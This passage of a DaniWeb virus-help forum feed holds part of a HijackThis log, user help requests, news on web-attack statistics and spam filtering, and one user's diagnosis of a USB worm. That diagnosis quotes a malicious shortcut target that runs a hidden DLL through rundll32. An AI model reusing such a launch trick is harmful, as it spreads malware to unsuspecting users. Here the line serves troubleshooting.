O2 - BHO: InfoAtoms - {103089DA-0F31-4A8B-843F-7D24A7FE8345} - C:\Program Files\InfoAtoms\IE32\InfoAtomsClientIE.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: BitComet ClickCapture - {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} - C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG10\avgssie.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\System32\DLA\DLASHX_W.DLL
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
O2 - BHO: AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\14.2.0.1\AVG Secure Search_toolbar.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.2.4204.1700\swg.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: ThinkVantage Password Manager - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\14.2.0.1\AVG Secure Search_toolbar.dll
O3 - Toolbar: (no name) - {ae07101b-46d4-4a98-af68-0333ea26e113} - (no file)
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] ICO.EXE
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [AMSG] C:\Program Files\ThinkVantage\AMSG\Amsg.exe
O4 - HKLM\..\Run: [LPManager] C:\PROGRA~1\THINKV~1\PrdCtr\LPMGR.exe
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [AwaySch] C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
O4 - HKLM\..\Run: [TVT Scheduler Proxy] C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
O4 - HKLM\..\Run: [PDService.exe] "C:\Program Files\Lenovo\SafeGuard PrivateDisk\pdservice.exe"
O4 - HKLM\..\Run: [cssauth] "C:\Program Files\Lenovo\Client Security Solution\cssauth.exe" silent
O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [vProt] "C:\Program Files\AVG Secure Search\vprot.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [SoundMax] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray
O4 - HKLM\..\Run: [AVG_TRAY] C:\Program Files\AVG\AVG10\avgtray.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [AdobeAAMUpdater-1.0] "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [ISUSPM] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
O4 - HKCU\..\RunOnce: [FlashPlayerUpdate] C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_6_602_180_Plugin.exe -update plugin
O4 - HKUS\S-1-5-18\..\RunOnce: [WUAppSetup] C:\Program Files\Common Files\logishrd\WUApp32.exe -v 0x046d -p 0x0809 -f video -m logitech -d 13.51.823.0 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [WUAppSetup] C:\Program Files\Common Files\logishrd\WUApp32.exe -v 0x046d -p 0x0809 -f video -m logitech -d 13.51.823.0 (User 'Default user')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.0.207\SSScheduler.exe
O8 - Extra context menu item: &amp;D&amp;ownload &amp;with BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddLink.htm
O8 - Extra context menu item: &amp;D&amp;ownload all with BitComet - res://C:\Program Files\BitComet\BitComet.exe/AddAllLink.htm
O8 - Extra context menu item: &amp;Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Google Photos Screensa&amp;ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: Download with &amp;Media Finder - C:\Program Files\Media Finder\hook.html
O8 - Extra context menu item: Download with ImTOO Download YouTube Video - C:\Program Files\ImTOO\Download YouTube Video\upod_link.HTM
O8 - Extra context menu item: E&amp;xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra 'Tools' menuitem: ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&amp;end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: BitComet - {D18A0B52-D63C-4ed0-AFC6-C1E3DC1AF43A} - res://C:\Program Files\BitComet\tools\BitCometBHO_1.5.4.11.dll/206 (file missing)
O9 - Extra button: System Update - {DA320635-F48C-4613-8325-D75A933C549E} - C:\Program Files\Lenovo\System Update\sulauncher.exe
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - <a href="http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1340400771796" rel="nofollow">http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1340400771796</a>
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - <a href="http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1340400763250" rel="nofollow">http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1340400763250</a>
O16 - DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} - 
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - <a href="http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab" rel="nofollow">http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab</a>
O17 - HKLM\System\CCS\Services\Tcpip\..\{EE9E0D08-A833-44F5-A4E5-A1AC56088EF1}: Domain = vpn.gatech.edu
O17 - HKLM\System\CCS\Services\Tcpip\..\{EE9E0D08-A833-44F5-A4E5-A1AC56088EF1}: NameServer = 128.61.244.254,130.207.244.244
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = vpn.gatech.edu,hsd1.ga.comcast.net.
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = vpn.gatech.edu,hsd1.ga.comcast.net.
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\14.2.0\ViProtocol.dll
O20 - Winlogon Notify: AwayNotify - C:\Program Files\Lenovo\AwayTask\AwayNotify.dll
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: SAS Core Service (!SASCORE) - SUPERAntiSpyware.com - C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
O23 - Service: Adobe Active File Monitor V10 (AdobeActiveFileMonitor10.0) - Adobe Systems Incorporated - C:\Program Files\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
O23 - Service: Adobe Active File Monitor V11 (AdobeActiveFileMonitor11.0) - Adobe Systems Incorporated - C:\Program Files\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: AVGIDSAgent - AVG Technologies CZ, s.r.o. - C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe
O23 - Service: AVG WatchDog (avgwd) - AVG Technologies CZ, s.r.o. - C:\Program Files\AVG\AVG10\avgwdsvc.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark Corporation - C:\Program Files\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: IPS Core Service (IPSSVC) - Lenovo Group Limited - C:\WINDOWS\system32\IPSSVC.EXE
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.0.207\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: Pure Networks Platform Service (nmservice) - Cisco Systems, Inc. - C:\Program Files\Common Files\Pure Networks Shared\Platform\nmsrvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Internet Pass-Through Service (PassThru Service) - Unknown owner - C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
O23 - Service: IBM PSA Access Driver Control (PsaSrv) - Unknown owner - C:\WINDOWS\system32\PsaSrv.exe
O23 - Service: Roxio UPnP Renderer 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe
O23 - Service: Roxio Upnp Server 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe
O23 - Service: LiveShare P2P Server 9 (RoxLiveShare9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: Roxio Hard Drive Watcher 9 (RoxWatch9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files\Skype\Updater\Updater.exe
O23 - Service: ThinkVantage Registry Monitor Service - Unknown owner - C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
O23 - Service: TomTomHOMEService - TomTom - C:\Program Files\TomTom HOME 2\TomTomHOMEService.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: Cisco AnyConnect Secure Mobility Agent (vpnagent) - Cisco Systems, Inc. - C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
O23 - Service: vToolbarUpdater14.2.0 - Unknown owner - C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\14.2.0\ToolbarUpdater.exe
O23 - Service: webcamXP Service (wxpSvc) - Unknown owner - C:\Program Files\wLite\wService.exe

--
End of file - 18866 bytes
</code></pre>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>Iggystooge</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453606/cant-delete-hijacking-virus</guid>
		</item>
				<item>
			<title>Facing some problem</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453466/facing-some-problem</link>
			<pubDate>Sat, 27 Apr 2013 20:29:16 +0000</pubDate>
			<description>Hi guys! I am facing a problem with my Avast free antivirus. I think that when using Avast my computer shows a blue screen problem and many times hangs. I am suffering with this problem. Can anyone help or tell me an alternative to Avast?</description>
			<content:encoded><![CDATA[ <p>Hi guys!</p>

<p>I am facing a problem with my Avast free antivirus. I think that when using Avast my computer shows a blue screen problem and many times hangs. I am suffering with this problem. Can anyone help or tell me an alternative to Avast?</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>Helper guy</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453466/facing-some-problem</guid>
		</item>
				<item>
			<title>Cyber-attack &#039;superfecta&#039; statistics released</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453172/cyber-attack-superfecta-statistics-released</link>
			<pubDate>Wed, 24 Apr 2013 06:45:03 +0000</pubDate>
			<description>You may be wondering what a superfecta actually is, and the answer is: the most dangerous and serious threat to business. To clarify, the superfecta as defined by secure cloud hosting outfit FireHost is a group of four attack vectors that comprises of Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), ...</description>
			<content:encoded><![CDATA[ <p>You may be wondering what a superfecta actually is, and the answer is: the most dangerous and serious threat to business. To clarify, the superfecta as defined by secure cloud hosting outfit FireHost is a group of four attack vectors comprising Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), SQL Injection and Directory Traversal.</p>

<p>Cross-Site Request Forgery (CSRF) is an attack mode that forces the end user to execute an unwanted action on a web application in which they are currently authenticated. Cross-Site Scripting (XSS) involves the insertion of malicious code into webpages in order to manipulate website visitors. SQL Injection, as everyone surely knows by now, involves entering malicious commands into URLs and text fields on websites that happen to be vulnerable, usually in an attempt to steal the contents of databases storing valuable data such as credit card details or usernames and passwords. And finally, Directory Traversal (also known as a Path Traversal attack) aims to access files and directories that are stored outside the web root folder.</p>

<p>At the InfoSecurity Europe show yesterday, FireHost revealed its 2013 web application attack statistics for the first quarter of the year, which detailed this superfecta as blocked by the firewalls protecting its servers in both Europe and the United States during the period covering January to March 2013.</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzEyNTI2OTdkOGQxNDMzZmEyMWU2MGQ2NGZlOGU0NmRlLmpwZw%3D%3D/500" alt="1252697d8d1433fa21e60d64fe8e46de" title="1252697d8d1433fa21e60d64fe8e46de" /> The volume of Cross-Site Request Forgery (CSRF) attacks was up by an astonishing 132% by the end of the quarter, compared to the same period during 2012. The second most significant increase in frequency was seen in SQL injections which rose by 87%. Overall, however, Cross-Site Scripting (XSS) was the most prevalent Superfecta attack type during the period monitored, with more than 1,200,000 attacks being blocked in total.</p>

<p>"The Superfecta represents the most dangerous type of cyberattack traffic, but these are by no means advanced or difficult attacks for cybercriminals to launch" says Chris Hinkley, Senior Security Engineer at FireHost who continues "for example, cross-site request forgery attacks and cross site scripting attacks are extremely automated and require very little knowledge to implement. It only makes sense that CSRF attacks would increase due to more automated attacks in the arsenals of cybercriminals. SQL Injection attacks represent a smaller portion of the attack traffic we block for our customers, as these attacks require more expertise, but when they're successful, they are very effective. Many will remember or have even been affected by successful SQL Injection attacks on a number of global brands over the past few years. What these numbers really say is malicious web traffic is very diverse and businesses should ensure that they are doing as much as possible to mitigate it."</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453172/cyber-attack-superfecta-statistics-released</guid>
		</item>
				<item>
			<title>Unknown Computer Nasties</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451957/unknown-computer-nasties</link>
			<pubDate>Mon, 08 Apr 2013 15:16:06 +0000</pubDate>
			<description>Guys, good day to everyone. I am trying to solve a computer problem (which I think is very interesting case of a computer nasty) from my sister's and her friends' computer. And also I want to share my discoveries and everything what I have found, and some queries. Here's the ...</description>
			<content:encoded><![CDATA[ <p>Guys, good day to everyone.</p>

<p>I am trying to solve a computer problem (which I think is very interesting case of a computer nasty) from my sister's and her friends' computer. And also I want to share my discoveries and everything what I have found, and some queries.</p>

<p>Here's the scenario:</p>

<p>One day, my sister approached me to ask if I could fix an "unknown virus" which affected their computers.<br />
I tried to figure it out, checked their computers, and found interesting things:</p>

<ol><li><p>In every directory I explore (their "<code>D:\Documents</code>" folder, for example), I tried to see if any hidden files are present (random-named files that are characteristic of a virus infection). But the folder options keep on reverting to Windows-default selected options. (Don't show hidden files, Hide protected system files, Hide extensions on common file names. Those circles are selected.)</p></li>
<li><p>I checked their Flash Drives (At my computer) and discovered that no <code>autorun.inf</code> is present. But these things I am investigating:</p>

<ol><li><p>A Shortcut link to their flash drive.<br />
I investigated this thing, and it showed as a gussied-up Windows Explorer icon, like this:<br /><code>Location: rundll32 (C:\Windows\System32)</code><br />
And I viewed the file properties. Here's the target:<br /><code>C:\Windows\System32\rundll32.exe ~$WBEHAX.NFC,crys xfnveaiqzhpygoxfn ygoxfnveaiqt</code><br />
I think there's something nasty here. Looks like a shortcut vulnerability.</p></li>
<li><p>As shown in the shortcut target above, there's the 3KB-sized <code>~$WBEHAX.NFC</code> file I found on the flash drive. (Different case on their friends' flash drives: "<code>~$WHMCAT.FAT</code>", and other files identical to those files.)</p></li>
<li><p>At some friends' flash drives, A random-named <code>.dll</code> file was found.<br />
Not only that, in each of the folders, there is an <code>.exe</code> file named the same as the directory where it is placed. For example, in the "<code>{Flash Drive}:\documents</code>" (<code>F:\Documents</code>) folder, there is a "<code>documents.exe</code>" file. Same for the other directories in their flash drives. Avira flagged those applications as a trojan. (TR/Generic)</p></li>
<li><p>Two legal-looking Windows files: <code>Thumbs.db</code> and <code>Desktop.ini</code>.<br />
I inspected the "thumbs.db" file, contained random characters. Looks legal.<br />
But the "Desktop.ini" also contained random characters. I began to doubt, because I know that is not the correct format of a "desktop.ini" file. The file size is also large for a legal "desktop.ini". I can't remember exactly, but the size is in three digits, in KB.</p></li>
</ol></li>
<li><p>I opened the suspicious shortcut link, on my computer. Some little bit suspicious things happened.<br />
First, I checked my Task Manager, and saw a legal-named application "<code>TrustedInstaller.exe</code>", but it is located at "C:\temp", not in the typical System32 folder.<br />
Second, I have seen some run32dll.exe instances, related to the link above.<br />
Third, it opens up browser windows (three windows), directing to some suspicious-looking Web links.<br />
Finally, it created some shortcuts on some of my folders on <code>C:\</code>, the same as redirecting to run32dll.exe.</p></li>
</ol>

<p>Luckily, my computer, on which I was testing this, is locked with a special drive-locking application that refreshes the whole computer at each restart. I became a little bit panicked. Restarted my PC.</p>

<p>Anyways, their PCs use Windows XP SP3. And I doubt, their PCs are not patched correctly. Antivirus outdated.</p>

<p>Guys share to me what can be the solutions here to identify what kind of computer nasty inflicted their PCs, and steps to remove it. It would be a great help to me and my friends' computer if we all together can figure out what's going on there. Thank you guys.</p>

<p><em>Current status:</em> Still figuring it out. I had seen some clues: W32/Conficker, W32/Sality, Windows Shell Vulnerabilities.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>CityThrille</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451957/unknown-computer-nasties</guid>
		</item>
				<item>
			<title>My Win. XP has a virus that doesn&#039;t allow installing, I want to format it</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451805/my-win.-xp-has-a-virus-that-doesnt-allow-installing-i-want-to-format-it</link>
			<pubDate>Sat, 06 Apr 2013 03:55:24 +0000</pubDate>
			<description>Does the repair/recovery disc for Windows xp need any sort of installing before I can format my hard drive with it? My computer has a virus that doesn't allow installing of programs. I want to know before I order it from eBay.. I don't know much about this sorta thing</description>
			<content:encoded><![CDATA[ <p>Does the repair/recovery disc for Windows xp need any sort of installing before I can format my hard drive with it? My computer has a virus that doesn't allow installing of programs. I want to know before I order it from eBay.. I don't know much about this sorta thing</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>VanessaGisel</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451805/my-win.-xp-has-a-virus-that-doesnt-allow-installing-i-want-to-format-it</guid>
		</item>
				<item>
			<title>Spamhaus DDoS attack not to blame for rise in spam</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/451322/spamhaus-ddos-attack-not-to-blame-for-rise-in-spam</link>
			<pubDate>Sun, 31 Mar 2013 11:20:37 +0000</pubDate>
			<description>The media, online and off, has been full of scare stories about the 'biggest Internet attack ever' and how a distributed denial of service (DDoS) campaign aimed against anti-spam outfit Spamhaus, which peaked at an attack volume of 300 Gbps (the highest ever recorded by those who record such things), was ...</description>
			<content:encoded><![CDATA[ <p>The media, online and off, has been full of scare stories about the 'biggest Internet attack ever' and how a distributed denial of service (DDoS) campaign aimed against anti-spam outfit Spamhaus, which peaked at an attack volume of 300 Gbps (the highest ever recorded by those who record such things), was 'slowing down the global Internet'. DaniWeb didn't join the rush to shout 'the sky is falling' as, frankly, we didn't believe it: there was precious little evidence to be found that the DDoS attack was impacting anyone other than Spamhaus, along with its anti-DDoS protection service CloudFlare and their upstream providers. Sure it was a serious attack, one that could well have implications on the direction such things are heading in, and potentially could be bad news for all of us. However, the Internet did not slow down and for the vast majority of global users there was no noticeable effect at all. The one area that you might think would be impacted is the amount of spam that reaches your mailbox. After all, if one of the main organisations responsible for keeping the lid on spam distribution channels is taken off air then surely we can expect to see spam levels peak. So when a press release arrived following these attacks which proclaimed that spam is twice as likely to be hitting mailboxes than previously, I was concerned. But only for a few moments, as a bit more reading reassured me that it had nothing to do with the Spamhaus attacks at all.</p>

<p><img src="/attachments/fetch/L2ltYWdlcy9hdHRhY2htZW50cy8wLzAwMTIxNTM5M2RkNzUxYThkYzlkYTkxZDVkZDBmMjAzLmpwZw%3D%3D/473" alt="001215393dd751a8dc9da91d5dd0f203" title="001215393dd751a8dc9da91d5dd0f203" /></p>

<p>Hear the name 'Virus Bulletin' and you immediately think of anti-virus and anti-malware certification and testing, but the same organization also carries out comprehensive spam filtering reviews. In the latest of these anti-spam comparative reviews, some 17 of the products and services put to the test passed with colours that flew enough to get the coveted 'VBSpam award' but there's a catch: the majority of them did so by catching less spam than they used to. In fact, a lot less spam. Of the 19 anti-spam solutions tested, only a rather worrying three of them managed to improve their spam catch rates with nine seeing the percentage of spam they missed at least double compared with recent test results. Indeed, as a result of the overall test figures, Virus Bulletin now reckons that a spam is almost twice as likely to make it into your inbox on average when compared to the previous batch of tests.</p>

<p>If that wasn't bad enough, it appears that the majority of the products tested also had quite a bit more difficulty in preventing false positives. Only four of them correctly identified all the legitimate email in the test runs. When it came to one of the biggest scourges in the average email inbox, phishing scams, more than half of the filters missed "at least 10%" of them in a dedicated feed of pure phishing mail messages.</p>

<p>This downward trend has been spotted before as a result of the VB testing; a very similar statistical drop popped up early in 2012 and continued throughout the first half of the year before the filters caught up with the con men and halted the decline. "Spam has been a relatively good news story in recent years, with spam levels declining while catch rates remained high," VB's Anti-Spam Test Director, Martijn Grooten, insists, though "in spam filtering, the devil is in the details, and when we look at these details, we see more emails slipping through the maze."</p>

<p>Considering that much of the spam that gets delivered will come complete with malware attachments or links to an exploited web site, the fact that spam catch rates are falling is of concern. Not least as it suggests that the bad guys are keeping ahead of the good guys in terms of tweaking the delivery process in order to avoid the filtering traps. While the anti-spam industry does appear to have a record of catching up with these tricks and tweaks, the fact that it takes them half a year to do so really isn't good enough.</p>
 ]]></content:encoded>
			<category domain="http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/64">Viruses, Spyware and other Nasties</category>
			<dc:creator>happygeek</dc:creator>
			<guid isPermaLink="true">http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/451322/spamhaus-ddos-attack-not-to-blame-for-rise-in-spam</guid>
		</item>
				<item>
			<title>PC infected by virus and antivirus isn&#039;t able to remove them, Please help!!</title>
			<link>http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/450869/pc-infected-by-virus-and-antivirus-isnt-able-to-remove-them-please-help</link>
